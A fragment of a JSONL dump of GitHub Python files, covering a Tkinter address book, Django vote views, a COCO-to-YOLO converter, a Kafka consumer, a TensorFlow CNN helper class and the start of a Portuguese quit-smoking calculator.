width=15)\n self.buttonDelete.grid(row=2, column=1, sticky=tk.S, **self.padding)\n\n self.buttonClose = tk.Button(self, text=\"Close\", width=15, command=exit)\n self.buttonClose.grid(\n row=2, column=1, columnspan=2, sticky=tk.SE, **self.padding\n )\n\n # scrollbars:\n ys = ttk.Scrollbar(self, orient=tk.VERTICAL, command=self.myTable.yview)\n self.myTable[\"yscrollcommand\"] = ys.set\n ys.grid(row=0, column=2, sticky=(tk.N, tk.S, tk.W))\n\n xs = ttk.Scrollbar(self, orient=tk.HORIZONTAL, command=self.myTable.xview)\n self.myTable[\"xscrollcommand\"] = xs.set\n xs.grid(row=1, column=0, columnspan=2, sticky=(tk.W, tk.E, tk.N))\n\n def hook_controls(self, controller):\n self.controller = controller\n self.myTable.bind(\"\", self._dclick_event)\n self.buttonDelete.configure(command=self.button_delete)\n # self.myTable.bind(\"<>\", self.tree_click_event)\n for col in self.cols:\n self.myTable.heading(\n col,\n # lambdas are pretty usefull alternative to callback functions\n command=lambda _col=col: self._sort_column(_col, False),\n )\n\n def _sort_column(self, column, reverse):\n print(f\"sorting by { column }\")\n ids = self.myTable.get_children(\"\")\n # check column data type. This is ugly..\n if self.myTable.set(ids[0], column).isnumeric():\n columnItems = [(int(self.myTable.set(id, column)), id) for id in ids]\n else:\n columnItems = [(self.myTable.set(id, column), id) for id in ids]\n # rearrange items in sorted positions\n columnItems.sort(reverse=reverse)\n for position, (value, id) in enumerate(columnItems):\n self.myTable.move(id, \"\", position)\n # reverse function next time\n self.myTable.heading(\n column, command=lambda _col=column: self._sort_column(_col, not reverse)\n )\n\n def hook_callback(self, callback: Callable):\n self.callback_load = callback\n\n def _dclick_event(self, event: tk.Event = None):\n item = self.myTable.selection()\n if len(item) != 0:\n clickedItem = self.myTable.item(*item)\n id = clickedItem[\"values\"][0]\n print(f\"double-clicked on id {id}\")\n self.callback_load(id)\n\n def initialize(self):\n self._show_all()\n\n def _show_all(self):\n # remove existing items:\n for item in self.myTable.get_children():\n self.myTable.delete(item)\n\n # populate freshly:\n addresses = self.controller.load_all_addresses()\n # addresses.sort(key=lambda x: x.lastName)\n for address in addresses:\n displayable = [\n address.id,\n address.firstName or \"\",\n address.lastName or \"\",\n address.birthday or \"\",\n address.street or \"\",\n address.city or \"\",\n address.zip or \"\",\n address.country or \"\",\n address.email or \"\",\n address.phone or \"\",\n ]\n self.myTable.insert(parent=\"\", index=\"end\", values=displayable)\n\n def button_delete(self):\n print(\"button delete\")\n item = self.myTable.selection()\n if len(item) != 0:\n clickedItem = self.myTable.item(*item)\n id = clickedItem[\"values\"][0]\n\n answer = msgBox.askquestion(\n title=\"Delete\",\n message=f\"Are you sure you want to delete id { id }?\",\n icon=\"warning\",\n )\n if answer == \"yes\":\n self.controller.delete_single_address(id)\n self._show_all()\n\n\nclass View:\n def __init__(self, controller):\n self.controller = controller\n self.root = controller.master\n # self.root.geometry(\"800x400\")\n self.padding = {\"padx\": 5, \"pady\": 5}\n\n self.labelTitle = tk.Label(self.root, text=\"Address Book\", font=(\"Calibri\", 32))\n self.labelTitle.grid(row=0, **self.padding)\n\n self.labelInstructions = tk.Label(\n self.root, text=\"Double-click on an existing entry in order to modify it.\"\n )\n self.labelInstructions.grid(row=1, **self.padding)\n\n # Create notebook with tabs\n self.tabControl = ttk.Notebook(self.root)\n self.tab0 = ViewTab1(self.tabControl)\n self.tab1 = ViewTab2(self.tabControl)\n\n self.tabControl.grid(row=2, sticky=tk.W, **self.padding)\n\n self.tab0.hook_controls(self.controller)\n self.tab1.hook_controls(self.controller)\n self.tab1.hook_callback(self.delegate_load)\n\n # Events:\n self.tabControl.bind(\"<>\", self.switch_handler)\n # self.root.bind(\"\", self.enter_key) # could be bound to submit button\n\n def switch_handler(self, event: tk.Event = None):\n tabName = self.tabControl.tab(event.widget.select(), \"text\")\n print(f\"switching to tab { tabName }\")\n tabIndex = event.widget.index(\"current\")\n\n if tabIndex == 1:\n self.tab1.initialize()\n\n def delegate_load(self, id: int):\n self.tabControl.select(0)\n self.tab0._load_single(id)\n\n # def enter_key(self, event: tk.Event = None):\n # print(\"enter key\")\n","repo_name":"woodly0/AddressBook_TkinterMVC","sub_path":"gui/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":12442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1042835262","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, redirect\n\nfrom ..models import Question, Answer\n\n@login_required(login_url='common:login')\ndef vote_question(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n if request.user == question.author:\n messages.error(request, '본인이 작성한 글은 추천할 수 없습니다.')\n else:\n question.voter.add(request.user)\n return redirect('pybo:detail', question_id=question.id)\n\n@login_required(login_url='common:login')\ndef vote_answer(request, answer_id):\n answer = get_object_or_404(Answer, pk=answer_id)\n if request.user == answer.author:\n messages.error(request, '본인이 작성한 댓글은 추천할 수 없습니다.')\n else:\n answer.voter.add(request.user)\n return redirect('pybo:detail', question_id=answer.question.id)","repo_name":"sungm1nn/Hello","sub_path":"mysite/pybo/views/vote_views.py","file_name":"vote_views.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"71194345641","text":"\"\"\"*********************************************************************************************************************\n* Title: Annotation Conversion: COCO JSON to YOLO Txt\n* Author: Haobin Tan\n* Date: 3. 5. 2022\n* Code version: 0.1\n* Availability: https://haobin-tan.netlify.app/ai/computer-vision/object-detection/coco-json-to-yolo-txt/#reference\n*********************************************************************************************************************\"\"\"\nimport os\nimport json\nfrom tqdm import tqdm\n\n\ndef convert_bbox_coco2yolo(img_width, img_height, bbox):\n x_tl, y_tl, w, h = bbox\n\n dw = 1.0 / img_width\n dh = 1.0 / img_height\n\n x_center = x_tl + w / 2.0\n y_center = y_tl + h / 2.0\n\n x = x_center * dw\n y = y_center * dh\n w = w * dw\n h = h * dh\n\n return [x, y, w, h]\n\n\ndef convert_coco_json_to_yolo_txt(output_path, json_file):\n with open(json_file) as f:\n json_data = json.load(f)\n\n label_file = os.path.join(output_path, \"_darknet.labels\")\n with open(label_file, \"w\") as f:\n for category in tqdm(json_data[\"categories\"], desc=\"Categories\"):\n category_name = category[\"name\"]\n f.write(f\"{category_name}\\n\")\n\n for image in tqdm(json_data[\"images\"], desc=\"Annotation txt for each iamge\"):\n img_id = image[\"id\"]\n img_name = image[\"file_name\"]\n img_width = image[\"width\"]\n img_height = image[\"height\"]\n\n anno_in_image = [anno for anno in json_data[\"annotations\"] if anno[\"image_id\"] == img_id]\n anno_txt = os.path.join(output_path, img_name.split(\".\")[0] + \".txt\")\n with open(anno_txt, \"w\") as f:\n for anno in anno_in_image:\n category = anno[\"category_id\"]\n bbox_COCO = anno[\"bbox\"]\n x, y, w, h = convert_bbox_coco2yolo(img_width, img_height, bbox_COCO)\n f.write(f\"{(category-1)} {x:.6f} {y:.6f} {w:.6f} {h:.6f}\\n\")\n\n print(\"Converting COCO Json to YOLO txt finished!\")\n\n\nif __name__ == '__main__':\n convert_coco_json_to_yolo_txt()","repo_name":"FilipMikus/Comparison_of_artificial_intelligence_methods_for_handwritten_number_recognition","sub_path":"image_recognition_app/datasets_formats/coco_to_yolo.py","file_name":"coco_to_yolo.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22739347852","text":"from domain.utils.obtain_image import exist, image_obtain\nfrom domain.utils.base64_to_image import to_image\nfrom instructure.storage import save_image\nfrom os import remove\nfrom concurrent.futures import ThreadPoolExecutor\nfrom domain.services.save_image_url_services import save_image_storage_with_url_service\nfrom domain.models.image_entity import ImageModel\nfrom domain.models.image3_entity import Image3Model\nfrom instructure.tynypng import optimize_images\n\ndef get_1_image_service( prompt:str) -> ImageModel:\n json_image =image_obtain(prompt)\n image_str = json_image[\"images\"][0]\n image = to_image(image_str)\n optimize_images(image[\"id\"])\n path =save_image(image[\"direction\"], image['id'])\n remove(image[\"direction\"])\n image_class = ImageModel(image['id'], path, json_image[\"parameters\"])\n return image_class\n \ndef get_3_image_service(\n init_prompt: str, middle_prompt: str, final_prompt: str\n ):\n with ThreadPoolExecutor(max_workers=3) as executor:\n init_promise = executor.submit(get_1_image_service, init_prompt)\n middle_promise = executor.submit(get_1_image_service, middle_prompt)\n final_promise = executor.submit(get_1_image_service, final_prompt)\n init = init_promise.result()\n middle = middle_promise.result()\n final = final_promise.result()\n images = Image3Model(init, middle, final)\n return images\n\ndef exit_url_service():\n return exist()","repo_name":"trueJomi/storage_python","sub_path":"domain/services/image_services.py","file_name":"image_services.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3136301030","text":"import json\nimport logging\nfrom typing import Any, Callable, Dict, List\n\nfrom classic.components import component\nfrom kafka import KafkaConsumer\n\n\ndef deserializer(value: bytes) -> Dict[str, Any]:\n return json.loads(value.decode('utf-8'))\n\n\nAPI_VERSION_AUTO_TIMEOUT_MS = 20000\nMAX_POLL_INTERVAL_MS = 86400000\nSASL_MECHANISM: str = 'SCRAM-SHA-512'\nSASL_SSL: str = 'SASL_SSL'\n\nlogger = logging.getLogger()\n\n\ndef create_consumer(\n topic: str,\n servers: List[str],\n service: Callable,\n group_id,\n ssl_path_certificate: str,\n user: str,\n password: str,\n):\n\n def consume():\n consumer = KafkaConsumer(\n bootstrap_servers=servers,\n value_deserializer=deserializer,\n auto_offset_reset='earliest',\n api_version_auto_timeout_ms=API_VERSION_AUTO_TIMEOUT_MS,\n max_poll_interval_ms=MAX_POLL_INTERVAL_MS,\n security_protocol=SASL_SSL,\n sasl_mechanism=SASL_MECHANISM,\n ssl_check_hostname=False,\n ssl_cafile=ssl_path_certificate,\n sasl_plain_username=user,\n sasl_plain_password=password,\n group_id=group_id,\n )\n\n consumer.subscribe([topic])\n try:\n for record in consumer:\n if record.value:\n service.run(record.value)\n consumer.commit()\n except Exception as e:\n logger.exception('Unexpected error occurred')\n raise e\n finally:\n consumer.close()\n\n return consume\n","repo_name":"AlexTolmy/hackaton","sub_path":"components/exhauster_backend/exhauster/adapters/kafka/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10536149404","text":"def solution(cr, cc, N):\n global grid, ans\n\n check = grid[cr][cc]\n for i in range(cr, cr + N):\n for j in range(cc, cc + N):\n if check != grid[i][j]:\n check = -1\n break\n\n if check == -1:\n ans += \"(\"\n solution(cr, cc, N//2)\n solution(cr, cc+N//2, N//2)\n solution(cr+N//2, cc, N//2)\n solution(cr+N//2, cc+N//2, N//2)\n ans += \")\"\n elif check == 1:\n ans += '1'\n elif check == 0:\n ans += '0'\n\n\nN = int(input())\ngrid = [list(map(int, input())) for _ in range(N)]\n\nans = ''\nsolution(0, 0, N)\nprint(ans)","repo_name":"tsinghua-auto4/ct_note","sub_path":"BOJ/2309/20/김동현_1992_쿼드트리.py","file_name":"김동현_1992_쿼드트리.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"37011723795","text":"import os\nimport algoraphics as ag\n\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\nc = ag.Canvas(400, 400)\n\n###########\n# Shadows #\n###########\n\nx = [\n ag.Circle(c=(100, 150), r=50, stroke=\"#FFDDDD\"),\n ag.Circle(c=(150, 100), r=50, stroke=\"#DDDDFF\"),\n]\nag.set_style(x, \"stroke-width\", 20)\nag.add_shadows(x, stdev=20, darkness=0.5)\n\ny = [[\n ag.Circle(c=(300, 250), r=50, fill=\"#FFDDDD\"),\n ag.Circle(c=(250, 300), r=50, fill=\"#DDDDFF\"),\n]]\n# ag.add_paper_texture(y)\n\n# Note that add_shadows adds shadows to the immediate list elements as\n# wholes, meaning the top circle should not project a shadow onto the\n# one behind it.\nag.add_shadows(y, stdev=20, darkness=0.5)\n\nc.add(x, y)\nc.png(\"png/textures1.png\")\n","repo_name":"daniel-munro/algoraphics","sub_path":"tests/test_textures.py","file_name":"test_textures.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"39724411261","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 17-9-18 下午3:59\n# @Author : MaybeShewill-CV\n# @Site : https://github.com/MaybeShewill-CV/lanenet-lane-detection\n# @File : cnn_basenet.py\n# @IDE: PyCharm Community Edition\n\"\"\"\nThe base convolution neural networks mainly implement some useful cnn functions\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\n\n\nclass CNNBaseModel(object):\n \"\"\"\n Base model for other specific cnn ctpn_models\n \"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def conv2d(inputdata, out_channel, kernel_size, padding='SAME',\n stride=1, w_init=None, b_init=None,\n split=1, use_bias=True, data_format='NHWC', name=None):\n \"\"\"\n Packing the tensorflow conv2d function.\n :param name: op name\n :param inputdata: A 4D tensorflow tensor which ust have known number of channels, but can have other\n unknown dimensions.\n :param out_channel: number of output channel.\n :param kernel_size: int so only support square kernel convolution\n :param padding: 'VALID' or 'SAME'\n :param stride: int so only support square stride\n :param w_init: initializer for convolution weights\n :param b_init: initializer for bias\n :param split: split channels as used in Alexnet mainly group for GPU memory save.\n :param use_bias: whether to use bias.\n :param data_format: default set to NHWC according tensorflow\n :return: tf.Tensor named ``output``\n \"\"\"\n with tf.variable_scope(name):\n in_shape = inputdata.get_shape().as_list()\n channel_axis = 3 if data_format == 'NHWC' else 1\n in_channel = in_shape[channel_axis]\n assert in_channel is not None, \"[Conv2D] Input cannot have unknown channel!\"\n assert in_channel % split == 0\n assert out_channel % split == 0\n\n padding = padding.upper()\n\n if isinstance(kernel_size, list):\n filter_shape = [kernel_size[0], kernel_size[1]] + [in_channel / split, out_channel]\n else:\n filter_shape = [kernel_size, kernel_size] + [in_channel / split, out_channel]\n\n if isinstance(stride, list):\n strides = [1, stride[0], stride[1], 1] if data_format == 'NHWC' \\\n else [1, 1, stride[0], stride[1]]\n else:\n strides = [1, stride, stride, 1] if data_format == 'NHWC' \\\n else [1, 1, stride, stride]\n\n if w_init is None:\n w_init = tf.contrib.layers.variance_scaling_initializer()\n if b_init is None:\n b_init = tf.constant_initializer()\n\n w = tf.get_variable('W', filter_shape, initializer=w_init)\n b = None\n\n if use_bias:\n b = tf.get_variable('b', [out_channel], initializer=b_init)\n\n if split == 1:\n conv = tf.nn.conv2d(inputdata, w, strides, padding, data_format=data_format)\n else:\n inputs = tf.split(inputdata, split, channel_axis)\n kernels = tf.split(w, split, 3)\n outputs = [tf.nn.conv2d(i, k, strides, padding, data_format=data_format)\n for i, k in zip(inputs, kernels)]\n conv = tf.concat(outputs, channel_axis)\n\n ret = tf.identity(tf.nn.bias_add(conv, b, data_format=data_format)\n if use_bias else conv, name=name)\n\n return ret\n\n @staticmethod\n def depthwise_conv(input_tensor, kernel_size, name, depth_multiplier=1,\n padding='SAME', stride=1):\n \"\"\"\n\n :param input_tensor:\n :param kernel_size:\n :param name:\n :param depth_multiplier:\n :param padding:\n :param stride:\n :return:\n \"\"\"\n with tf.variable_scope(name_or_scope=name):\n in_shape = input_tensor.get_shape().as_list()\n in_channel = in_shape[3]\n padding = padding.upper()\n\n depthwise_filter_shape = [kernel_size, kernel_size] + [in_channel, depth_multiplier]\n w_init = tf.contrib.layers.variance_scaling_initializer()\n\n depthwise_filter = tf.get_variable(\n name='depthwise_filter_w', shape=depthwise_filter_shape,\n initializer=w_init\n )\n\n result = tf.nn.depthwise_conv2d(\n input=input_tensor,\n filter=depthwise_filter,\n strides=[1, stride, stride, 1],\n padding=padding,\n name='depthwise_conv_output'\n )\n return result\n\n @staticmethod\n def relu(inputdata, name=None):\n \"\"\"\n\n :param name:\n :param inputdata:\n :return:\n \"\"\"\n return tf.nn.relu(features=inputdata, name=name)\n\n @staticmethod\n def sigmoid(inputdata, name=None):\n \"\"\"\n\n :param name:\n :param inputdata:\n :return:\n \"\"\"\n return tf.nn.sigmoid(x=inputdata, name=name)\n\n @staticmethod\n def maxpooling(inputdata, kernel_size, stride=None, padding='VALID',\n data_format='NHWC', name=None):\n \"\"\"\n\n :param name:\n :param inputdata:\n :param kernel_size:\n :param stride:\n :param padding:\n :param data_format:\n :return:\n \"\"\"\n padding = padding.upper()\n\n if stride is None:\n stride = kernel_size\n\n if isinstance(kernel_size, list):\n kernel = [1, kernel_size[0], kernel_size[1], 1] if data_format == 'NHWC' else \\\n [1, 1, kernel_size[0], kernel_size[1]]\n else:\n kernel = [1, kernel_size, kernel_size, 1] if data_format == 'NHWC' \\\n else [1, 1, kernel_size, kernel_size]\n\n if isinstance(stride, list):\n strides = [1, stride[0], stride[1], 1] if data_format == 'NHWC' \\\n else [1, 1, stride[0], stride[1]]\n else:\n strides = [1, stride, stride, 1] if data_format == 'NHWC' \\\n else [1, 1, stride, stride]\n\n return tf.nn.max_pool(value=inputdata, ksize=kernel, strides=strides, padding=padding,\n data_format=data_format, name=name)\n\n @staticmethod\n def avgpooling(inputdata, kernel_size, stride=None, padding='VALID',\n data_format='NHWC', name=None):\n \"\"\"\n\n :param name:\n :param inputdata:\n :param kernel_size:\n :param stride:\n :param padding:\n :param data_format:\n :return:\n \"\"\"\n if stride is None:\n stride = kernel_size\n\n kernel = [1, kernel_size, kernel_size, 1] if data_format == 'NHWC' \\\n else [1, 1, kernel_size, kernel_size]\n\n strides = [1, stride, stride, 1] if data_format == 'NHWC' else [1, 1, stride, stride]\n\n return tf.nn.avg_pool(value=inputdata, ksize=kernel, strides=strides, padding=padding,\n data_format=data_format, name=name)\n\n @staticmethod\n def globalavgpooling(inputdata, data_format='NHWC', name=None):\n \"\"\"\n\n :param name:\n :param inputdata:\n :param data_format:\n :return:\n \"\"\"\n assert inputdata.shape.ndims == 4\n assert data_format in ['NHWC', 'NCHW']\n\n axis = [1, 2] if data_format == 'NHWC' else [2, 3]\n\n return tf.reduce_mean(input_tensor=inputdata, axis=axis, name=name)\n\n @staticmethod\n def layernorm(inputdata, epsilon=1e-5, use_bias=True, use_scale=True,\n data_format='NHWC', name=None):\n \"\"\"\n :param name:\n :param inputdata:\n :param epsilon: epsilon to avoid divide-by-zero.\n :param use_bias: whether to use the extra affine transformation or not.\n :param use_scale: whether to use the extra affine transformation or not.\n :param data_format:\n :return:\n \"\"\"\n shape = inputdata.get_shape().as_list()\n ndims = len(shape)\n assert ndims in [2, 4]\n\n mean, var = tf.nn.moments(inputdata, list(range(1, len(shape))), keep_dims=True)\n\n if data_format == 'NCHW':\n channnel = shape[1]\n new_shape = [1, channnel, 1, 1]\n else:\n channnel = shape[-1]\n new_shape = [1, 1, 1, channnel]\n if ndims == 2:\n new_shape = [1, channnel]\n\n if use_bias:\n beta = tf.get_variable('beta', [channnel], initializer=tf.constant_initializer())\n beta = tf.reshape(beta, new_shape)\n else:\n beta = tf.zeros([1] * ndims, name='beta')\n if use_scale:\n gamma = tf.get_variable('gamma', [channnel], initializer=tf.constant_initializer(1.0))\n gamma = tf.reshape(gamma, new_shape)\n else:\n gamma = tf.ones([1] * ndims, name='gamma')\n\n return tf.nn.batch_normalization(inputdata, mean, var, beta, gamma, epsilon, name=name)\n\n @staticmethod\n def instancenorm(inputdata, epsilon=1e-5, data_format='NHWC', use_affine=True, name=None):\n \"\"\"\n\n :param name:\n :param inputdata:\n :param epsilon:\n :param data_format:\n :param use_affine:\n :return:\n \"\"\"\n shape = inputdata.get_shape().as_list()\n if len(shape) != 4:\n raise ValueError(\"Input data of instancebn layer has to be 4D tensor\")\n\n if data_format == 'NHWC':\n axis = [1, 2]\n ch = shape[3]\n new_shape = [1, 1, 1, ch]\n else:\n axis = [2, 3]\n ch = shape[1]\n new_shape = [1, ch, 1, 1]\n if ch is None:\n raise ValueError(\"Input of instancebn require known channel!\")\n\n mean, var = tf.nn.moments(inputdata, axis, keep_dims=True)\n\n if not use_affine:\n return tf.divide(inputdata - mean, tf.sqrt(var + epsilon), name='output')\n\n beta = tf.get_variable('beta', [ch], initializer=tf.constant_initializer())\n beta = tf.reshape(beta, new_shape)\n gamma = tf.get_variable('gamma', [ch], initializer=tf.constant_initializer(1.0))\n gamma = tf.reshape(gamma, new_shape)\n return tf.nn.batch_normalization(inputdata, mean, var, beta, gamma, epsilon, name=name)\n\n @staticmethod\n def dropout(inputdata, keep_prob, noise_shape=None, name=None):\n \"\"\"\n\n :param name:\n :param inputdata:\n :param keep_prob:\n :param noise_shape:\n :return:\n \"\"\"\n return tf.nn.dropout(inputdata, keep_prob=keep_prob, noise_shape=noise_shape, name=name)\n\n @staticmethod\n def fullyconnect(inputdata, out_dim, w_init=None, b_init=None,\n use_bias=True, name=None):\n \"\"\"\n Fully-Connected layer, takes a N>1D tensor and returns a 2D tensor.\n It is an equivalent of `tf.layers.dense` except for naming conventions.\n\n :param inputdata: a tensor to be flattened except for the first dimension.\n :param out_dim: output dimension\n :param w_init: initializer for w. Defaults to `variance_scaling_initializer`.\n :param b_init: initializer for b. Defaults to zero\n :param use_bias: whether to use bias.\n :param name:\n :return: tf.Tensor: a NC tensor named ``output`` with attribute `variables`.\n \"\"\"\n shape = inputdata.get_shape().as_list()[1:]\n if None not in shape:\n inputdata = tf.reshape(inputdata, [-1, int(np.prod(shape))])\n else:\n inputdata = tf.reshape(inputdata, tf.stack([tf.shape(inputdata)[0], -1]))\n\n if w_init is None:\n w_init = tf.contrib.layers.variance_scaling_initializer()\n if b_init is None:\n b_init = tf.constant_initializer()\n\n ret = tf.layers.dense(inputs=inputdata, activation=lambda x: tf.identity(x, name='output'),\n use_bias=use_bias, name=name,\n kernel_initializer=w_init, bias_initializer=b_init,\n trainable=True, units=out_dim)\n return ret\n\n @staticmethod\n def layerbn(inputdata, is_training, name, scale=True):\n \"\"\"\n\n :param inputdata:\n :param is_training:\n :param name:\n :param scale:\n :return:\n \"\"\"\n\n return tf.layers.batch_normalization(inputs=inputdata, training=is_training, name=name, scale=scale)\n\n @staticmethod\n def layergn(inputdata, name, group_size=32, esp=1e-5):\n \"\"\"\n\n :param inputdata:\n :param name:\n :param group_size:\n :param esp:\n :return:\n \"\"\"\n with tf.variable_scope(name):\n inputdata = tf.transpose(inputdata, [0, 3, 1, 2])\n n, c, h, w = inputdata.get_shape().as_list()\n group_size = min(group_size, c)\n inputdata = tf.reshape(inputdata, [-1, group_size, c // group_size, h, w])\n mean, var = tf.nn.moments(inputdata, [2, 3, 4], keep_dims=True)\n inputdata = (inputdata - mean) / tf.sqrt(var + esp)\n\n # 每个通道的gamma和beta\n gamma = tf.Variable(tf.constant(1.0, shape=[c]), dtype=tf.float32, name='gamma')\n beta = tf.Variable(tf.constant(0.0, shape=[c]), dtype=tf.float32, name='beta')\n gamma = tf.reshape(gamma, [1, c, 1, 1])\n beta = tf.reshape(beta, [1, c, 1, 1])\n\n # 根据论文进行转换 [n, c, h, w, c] 到 [n, h, w, c]\n output = tf.reshape(inputdata, [-1, c, h, w])\n output = output * gamma + beta\n output = tf.transpose(output, [0, 2, 3, 1])\n\n return output\n\n @staticmethod\n def squeeze(inputdata, axis=None, name=None):\n \"\"\"\n\n :param inputdata:\n :param axis:\n :param name:\n :return:\n \"\"\"\n return tf.squeeze(input=inputdata, axis=axis, name=name)\n\n @staticmethod\n def deconv2d(inputdata, out_channel, kernel_size, padding='SAME',\n stride=1, w_init=None, b_init=None,\n use_bias=True, activation=None, data_format='channels_last',\n trainable=True, name=None):\n \"\"\"\n Packing the tensorflow conv2d function.\n :param name: op name\n :param inputdata: A 4D tensorflow tensor which ust have known number of channels, but can have other\n unknown dimensions.\n :param out_channel: number of output channel.\n :param kernel_size: int so only support square kernel convolution\n :param padding: 'VALID' or 'SAME'\n :param stride: int so only support square stride\n :param w_init: initializer for convolution weights\n :param b_init: initializer for bias\n :param activation: whether to apply a activation func to deconv result\n :param use_bias: whether to use bias.\n :param data_format: default set to NHWC according tensorflow\n :return: tf.Tensor named ``output``\n \"\"\"\n with tf.variable_scope(name):\n in_shape = inputdata.get_shape().as_list()\n channel_axis = 3 if data_format == 'channels_last' else 1\n in_channel = in_shape[channel_axis]\n assert in_channel is not None, \"[Deconv2D] Input cannot have unknown channel!\"\n\n padding = padding.upper()\n\n if w_init is None:\n w_init = tf.contrib.layers.variance_scaling_initializer()\n if b_init is None:\n b_init = tf.constant_initializer()\n\n ret = tf.layers.conv2d_transpose(inputs=inputdata, filters=out_channel,\n kernel_size=kernel_size,\n strides=stride, padding=padding,\n data_format=data_format,\n activation=activation, use_bias=use_bias,\n kernel_initializer=w_init,\n bias_initializer=b_init, trainable=trainable,\n name=name)\n return ret\n\n @staticmethod\n def dilation_conv(input_tensor, k_size, out_dims, rate, padding='SAME',\n w_init=None, b_init=None, use_bias=False, name=None):\n \"\"\"\n\n :param input_tensor:\n :param k_size:\n :param out_dims:\n :param rate:\n :param padding:\n :param w_init:\n :param b_init:\n :param use_bias:\n :param name:\n :return:\n \"\"\"\n with tf.variable_scope(name):\n in_shape = input_tensor.get_shape().as_list()\n in_channel = in_shape[3]\n assert in_channel is not None, \"[Conv2D] Input cannot have unknown channel!\"\n\n padding = padding.upper()\n\n if isinstance(k_size, list):\n filter_shape = [k_size[0], k_size[1]] + [in_channel, out_dims]\n else:\n filter_shape = [k_size, k_size] + [in_channel, out_dims]\n\n if w_init is None:\n w_init = tf.contrib.layers.variance_scaling_initializer()\n if b_init is None:\n b_init = tf.constant_initializer()\n\n w = tf.get_variable('W', filter_shape, initializer=w_init)\n b = None\n\n if use_bias:\n b = tf.get_variable('b', [out_dims], initializer=b_init)\n\n conv = tf.nn.atrous_conv2d(value=input_tensor, filters=w, rate=rate,\n padding=padding, name='dilation_conv')\n\n if use_bias:\n ret = tf.add(conv, b)\n else:\n ret = conv\n\n return ret\n\n @staticmethod\n def spatial_dropout(input_tensor, keep_prob, is_training, name, seed=1234):\n \"\"\"\n 空间dropout实现\n :param input_tensor:\n :param keep_prob:\n :param is_training:\n :param name:\n :param seed:\n :return:\n \"\"\"\n\n def f1():\n input_shape = input_tensor.get_shape().as_list()\n noise_shape = tf.constant(value=[input_shape[0], 1, 1, input_shape[3]])\n return tf.nn.dropout(input_tensor, keep_prob, noise_shape, seed=seed, name=\"spatial_dropout\")\n\n def f2():\n return input_tensor\n\n with tf.variable_scope(name_or_scope=name):\n\n output = tf.cond(is_training, f1, f2)\n\n return output\n\n @staticmethod\n def lrelu(inputdata, name, alpha=0.2):\n \"\"\"\n\n :param inputdata:\n :param alpha:\n :param name:\n :return:\n \"\"\"\n with tf.variable_scope(name):\n return tf.nn.relu(inputdata) - alpha * tf.nn.relu(-inputdata)\n","repo_name":"MaybeShewill-CV/lanenet-lane-detection","sub_path":"semantic_segmentation_zoo/cnn_basenet.py","file_name":"cnn_basenet.py","file_ext":"py","file_size_in_byte":18774,"program_lang":"python","lang":"en","doc_type":"code","stars":2153,"dataset":"github-code","pt":"18"} +{"seq_id":"6392483994","text":"import time\r\n\r\nquitYear = quitMonth = quitDay = quitHour = quitMinute = quitTime = packsPerDay = averagePackCost = smokesInPack = ''\r\n\r\n# Get user quit info\r\n\r\n# Find out when the user quit smoking.\r\nquitYear = input(\"Em que ano tu vais parar de fumar?(Ex.: 2001)\\n\")\r\nquitMonth = input(\"Em que mes tu vais parar de fumar? (1 ao 12)\\n\")\r\nquitDay = input(\"Em que dia tu vais parar de fumar? (1 ao 31)\\n\")\r\nquitHour = input(\"Em que horas tu vais parar de fumar? (0 ao 23)\\n\")\r\nquitMinute = input(\"Em que minuto tu vais deixar de fumar? (0 ao 59)\\n\")\r\n\r\n# Assemble the pieces into a meaningful unit for calculation.\r\nquitTime = (quitYear, quitMonth, quitDay, quitHour, quitMinute, -1, -1, -1, -1)\r\n\r\n# Determine the extent of the self-injury habit.\r\npacksPerDay = input(\"Quantas carteiras de cigarro voce fuma por dia?\\n\")\r\naveragePackCost = input(\"Quando custa o a carteira?\\n\")\r\nsmokesInPack = input(\"Quantos cigarros vem em cada carteira?\\n\")\r\n\r\nprint (quitTime)\r\nprint (\"Este e o seu numero de pacotes por dia: \" + str(packsPerDay))\r\nprint (\"Este e o custo deles: \" + str(averagePackCost))\r\nprint (\"Este e o numero de tragadas por pacote: \" + str(smokesInPack))\r\n\r\nquitTime1 = time.mktime(quitTime)\r\ncurrentTime = time.time()\r\ntimeDifference = currentTime - quitTime1\r\n\r\nyourMinutes = timeDifference / 60\r\nyourHours = yourMinutes / 60\r\nyourDays = yourHours / 24\r\nyourWeeks = yourDays / 7\r\nyourLunarMonths = yourWeeks /4\r\nyourYears = yourWeeks / 52\r\n\r\nsmokesPerDay = packsPerDay * smokesInPack\r\ncigarettesNotSmoked = smokesPerDay * yourDays\r\naddedLife = cigarettesNotSmoked * 11\r\nmoneySaved1 = averagePackCost * packsPerDay\r\nmoneySaved = moneySaved1 * yourDays\r\nyourTimes = (yourMinutes, yourHours, yourDays, yourWeeks, yourLunarMonths, yourYears)\r\nyourTimesLabels = {'Minutos': yourMinutes, 'horas': yourHours, 'dias': yourDays, 'semanas': yourWeeks, 'meses': yourLunarMonths, 'anos': yourYears}\r\n\r\nprint (\"Este sera o tempo de parar: \" + str(quitTime1))\r\nprint (\"Este e o atual tempo: \" + str(currentTime))\r\nprint (\"Este e a diferenca do tempo de parar ate o tempo atual: \" + str(timeDifference))\r\n\r\nprint 